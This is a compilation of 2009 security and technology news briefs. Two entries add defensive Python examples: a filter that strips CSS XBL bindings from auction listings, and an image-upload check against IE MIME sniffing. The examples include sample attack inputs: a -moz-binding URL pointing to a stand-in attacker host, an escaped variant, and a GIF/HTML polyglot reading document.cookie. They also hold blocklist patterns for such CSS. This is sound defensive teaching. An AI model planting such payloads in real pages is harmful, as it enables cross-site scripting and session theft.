Swindlers are using XSS in conjunction with the XML Binding Language (XBL), which allows elements in an HTML document to be bound to content from another web site through a CSS declaration. Whether the error lies with eBay or in the browser is still unknown.
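The item above describes the vector only in outline: the XBL binding is attached to an ordinary listing element through a style declaration (-moz-binding in Gecko), so the markup the seller submits never has to contain a script tag. As an added example, not code from the heise item or from eBay, here is a small Python filter for seller-supplied listing HTML that catches that CSS side of the trick. It first normalizes CSS comments and escapes (the two cheapest obfuscations), then rejects any style attribute or style block that carries a binding, an IE behavior, an expression() or an @import. The sample listings and the attacker.invalid host are constructed, and the property list is the editor's own choice, not a description of how eBay's filter works.

```python
import re

# Constructed samples of seller-supplied listing HTML (not real eBay data).
# attacker.invalid is a placeholder host, not a real server.
LISTING_WITH_XBL = (
    '<div style="-moz-binding: url(http://attacker.invalid/bind.xml#run)">'
    "Great item, buy now!</div>"
)
# Same binding hidden with a CSS hex escape (\62 is 'b') and a comment.
LISTING_OBFUSCATED = (
    '<p style="-moz-\\62 ind/**/ing:url(http://attacker.invalid/b.xml#r)">hi</p>'
)
LISTING_STYLE_BLOCK = "<style>p { behavior: url(x.htc) }</style><p>x</p>"
LISTING_CLEAN = '<div style="color: red; background: url(/img/bg.png)">Great item!</div>'

# CSS that pulls executable content from elsewhere: XBL bindings in Gecko
# (-moz-binding), HTC behaviors and expression() in IE, @import of remote sheets.
DANGEROUS_CSS = re.compile(
    r"(?:-moz-binding|behavior)\s*:|expression\s*\(|@import\b", re.IGNORECASE
)
STYLE_ATTR = re.compile(
    r"""\s+style\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE
)
STYLE_BLOCK = re.compile(r"<style\b[^>]*>(.*?)</style>", re.IGNORECASE | re.DOTALL)
CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# \HHHHHH followed by an optional whitespace terminator, or \ plus any one char.
CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n]?|\\(.)", re.DOTALL)


def normalize_css(css):
    """Strip comments and decode CSS escapes so the property names can be matched."""
    css = CSS_COMMENT.sub("", css)
    return CSS_ESCAPE.sub(
        lambda m: chr(int(m.group(1), 16)) if m.group(1) else m.group(2), css
    )


def is_dangerous_css(css):
    return DANGEROUS_CSS.search(normalize_css(css)) is not None


def _attr_css(match):
    # Whichever quoting form matched, return the attribute value.
    return next(g for g in match.groups() if g is not None)


def find_css_bindings(html):
    """Return the normalized CSS fragments that would bind remote code."""
    hits = []
    for m in STYLE_ATTR.finditer(html):
        if is_dangerous_css(_attr_css(m)):
            hits.append(normalize_css(_attr_css(m)))
    for m in STYLE_BLOCK.finditer(html):
        if is_dangerous_css(m.group(1)):
            hits.append(normalize_css(m.group(1)))
    return hits


def sanitize_listing(html):
    """Drop every style attribute or <style> block that carries a binding."""
    html = STYLE_ATTR.sub(
        lambda m: "" if is_dangerous_css(_attr_css(m)) else m.group(0), html
    )
    html = STYLE_BLOCK.sub(
        lambda m: "" if is_dangerous_css(m.group(1)) else m.group(0), html
    )
    return html


if __name__ == "__main__":
    for sample in (LISTING_WITH_XBL, LISTING_OBFUSCATED, LISTING_STYLE_BLOCK, LISTING_CLEAN):
        print(find_css_bindings(sample), "->", sanitize_listing(sample))
```

A blocklist like this is the quick fix; the durable one is to parse seller CSS into property/value pairs and allow only a known-safe set of properties, which is what keeps the next vendor-specific binding property from slipping through.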
----------
McAfee Monthly Spam Report for March
Key findings include:
Spam campaigns are taking advantage of “partitioning” to increase their effectiveness and combat the efforts of security tools to reduce their reach.
Replica-watch spam has taken over the number one position for holiday spam.
Business leaders and legislatures have promised to stamp out spam, yet the plague persists. Does reputation-based security hold the key?
Putting a dollar value on productivity lost due to spam.
Download a copy here.
----------
Copying our attorney's verdict?
Ex-NFL Player Sues Over Madden NFL Games
By KARINA BROWN
LOS ANGELES (CN) - Former Cleveland Browns running back and NFL Hall of Famer Jim Brown says Electronic Arts illegally used him as a character in several versions of its Madden NFL video games.
----------
Who should Software Freedom sue on FAT32?
Microsoft owns FAT32, but it didn’t appear to pursue its rights against companies that supported FAT32 in their Linux thumb drives and consumer electronics.
Until the TomTom case. At which point Jeremy Allison of Samba says Microsoft had secret cross-licensing deals with all those other guys which violate the GPL.
So the question becomes, who should Software Freedom sue?
----------
Friday, March 6, 2009
Friday 03/06/09
March 2009 Advanced Notification
Posted Thursday, March 05, 2009 9:57 AM by MSRCTEAM
Hello, Bill here.
I wanted to let you know that we just posted our Advance Notification for next week’s bulletin release, scheduled for Tuesday, March 10, 2009 around 10 a.m. Pacific Standard Time.
As part of this month’s security bulletin release process, we will issue three security bulletins – one rated ‘Critical’ and two rated ‘Important’ – to address vulnerabilities in Microsoft Windows. Depending on the bulletin, a restart may be required.
----------
Microsoft: No patch for Excel zero-day flaw next week
----------
Twitter spoofing fix fails in UK and Germany
Twitter's claim to have fixed the spoofing vulnerability has been found to be untrue in the UK and Germany.
----------
Risky MIME sniffing in Internet Explorer
Uploading images is a standard requirement for any Web 2.0 application, but some features of Internet Explorer need to be handled carefully; otherwise a hole can open up that facilitates cross-site scripting attacks on site visitors.
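The feature in question is IE's content sniffing: when a response's bytes look like HTML, IE may render them as HTML regardless of the Content-Type, so an "image" whose body carries markup runs as script on the upload site's origin. As an added example, not code from the heise article, here is a Python upload check and the headers the stored file should be served with. The check accepts only bytes that begin with a known image signature, requires the declared type to match, and rejects files that carry HTML markers inside the window a sniffer inspects. The sample files are constructed, the 256-byte window and the marker list are assumptions based on Microsoft's published description of IE's sniffer rather than copied from it, and the nosniff header is honored by IE8 and later.

```python
# Constructed upload samples (not files from the article). The polyglot is the
# shape of the attack: a valid GIF header followed by markup a sniffer treats as HTML.
CLEAN_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 32
CLEAN_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
GIF_HTML_POLYGLOT = (
    b"GIF89a\x01\x00\x01\x00"
    + b"<html><script>alert(document.cookie)</script></html>"
)
PLAIN_HTML = b"<html><body>not an image</body></html>"

# Magic bytes of the image formats this upload endpoint accepts.
IMAGE_SIGNATURES = (
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
)

# Assumed sniffer behaviour: inspect the first 256 bytes for HTML markers.
# The marker list is a subset chosen for this example, not IE's exact table.
SNIFF_WINDOW = 256
HTML_MARKERS = (
    b"<html", b"<head", b"<title", b"<body", b"<script", b"<a href",
    b"<img", b"<pre", b"<table", b"<plaintext", b"<iframe",
)


def detect_image_type(data):
    """Return the MIME type implied by the leading bytes, or None."""
    for signature, mime in IMAGE_SIGNATURES:
        if data.startswith(signature):
            return mime
    return None


def looks_like_html(data):
    """True if the bytes a sniffer would inspect contain an HTML marker."""
    window = data[:SNIFF_WINDOW].lower()
    return any(marker in window for marker in HTML_MARKERS)


def validate_upload(data, declared_type):
    """Decide whether to store an upload. Returns (accepted, detected_mime, reason)."""
    mime = detect_image_type(data)
    if mime is None:
        return False, None, "no known image signature"
    if declared_type != mime:
        return False, mime, "declared Content-Type does not match the bytes"
    if looks_like_html(data):
        return False, mime, "HTML markup inside the sniff window"
    return True, mime, "ok"


def response_headers(mime, filename):
    """Headers to serve a stored image with so the browser does not re-sniff it."""
    return {
        "Content-Type": mime,
        # IE8 and later honor this and trust the declared Content-Type.
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'inline; filename="%s"' % filename,
    }


if __name__ == "__main__":
    for name, sample in (("clean gif", CLEAN_GIF), ("polyglot", GIF_HTML_POLYGLOT),
                         ("html", PLAIN_HTML)):
        print(name, validate_upload(sample, "image/gif"))
    print(response_headers("image/png", "avatar.png"))
```

The marker scan can reject a legitimate image whose pixel data happens to contain a tag-like byte run, which is acceptable for an upload endpoint. The stronger controls are to re-encode every upload with an image library so nothing but pixels survives, and to serve user files from a separate, cookieless host so that even a sniffed file cannot reach the application's session.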
----------
Firefox: most vulnerabilities, but quickly patched
Secunia has published its security report for 2008, saying that 115 vulnerabilities were eliminated from Firefox in 2008, more than those found in Internet Explorer, Safari and Opera put together.
----------
Microsoft has confirmed that users will be able to remove its IE8 browser, as well as several other integrated applications, from Windows 7. Jack Mayo, a group program manager on the Windows team, listed in a blog post the applications that can be switched off. They include Internet Explorer 8, Fax and Scan, handwriting recognition, Windows DVD Maker, Windows Gadget Platform, Windows Media Player, Windows Media Center, Windows Search, and XPS Viewer and Services. He explained that the files associated with those applications and features are not actually deleted from the hard drive. The public beta of Windows 7 does not include the ability to 'kill' said apps. But a pirated copy of Windows 7 Build 7048 includes the new removal options, and has been leaked on the Internet.
----------
'Napping' datacenters cut energy use by 75%
Christopher Jablonski: Researchers at the University of Michigan announced a plan to save up to 75 percent of the energy that power-hungry datacenters consume by putting idle servers to sleep when they're not in use.
----------
Illinois Sheriff Says Craigslist Is 'Largest Source of Prostitution'
CHICAGO (CN) - Craigslist openly and unabashedly facilitates prostitution, Cook County Sheriff Thomas Dart claims in state court. He filed a lawsuit to shut down the online classified site's "erotic services" section, calling it a "convenient clearinghouse for pimps, prostitutes and patrons that enables sellers to advertise and buyers to peruse discreetly."
----------
Unpatched PDF bug poses growing threat, say researchers
An unpatched bug in popular PDF viewing and editing applications is more dangerous than first thought, according to security researchers who created exploits that sidestep Adobe Systems' defensive advice.
----------
Botnet ringleader gets four years in prison for stealing data from PCs
March 5, 2009 (Computerworld) The first person to be charged under federal wiretap statutes for using a botnet to steal data and commit fraud was sentenced to four years in prison this week.
John Schiefer, a 27-year-old Los Angeles resident, was also ordered to pay $2,500 in fines. The sentence was handed down Wednesday by U.S. District Judge Howard Matz in federal court in Los Angeles.
Schiefer, a former security researcher, agreed to plead guilty in November 2007 to stealing usernames, passwords and financial data from more than 250,000 compromised systems, then installing adware on the massive botnet that he and several accomplices set up.
----------
Mahalo CEO defends IT staffer who ran botnet before being hired
Search engine exec says he hopes to offer John Schiefer a new job after sentence is up
----------
NYPD faces ID theft risk after data stolen from pension fund
----------
Catbird tightens security of virtual machines
Catbird is upgrading its virtual security software platform to better track virtual machines as they replicate themselves and to make sure the proper security policies follow them wherever they go.
The product, VMShield 2.0, includes V-Tracker, technology that uses more attributes to define virtual machines, making it more likely that VMs will be tracked accurately when they create other versions of themselves.
VMShield then makes sure that the proper policies are applied to all instances of the virtual machine. The policy checks not only pertain to attributes of the virtual machine but also to the physical machine it migrates to.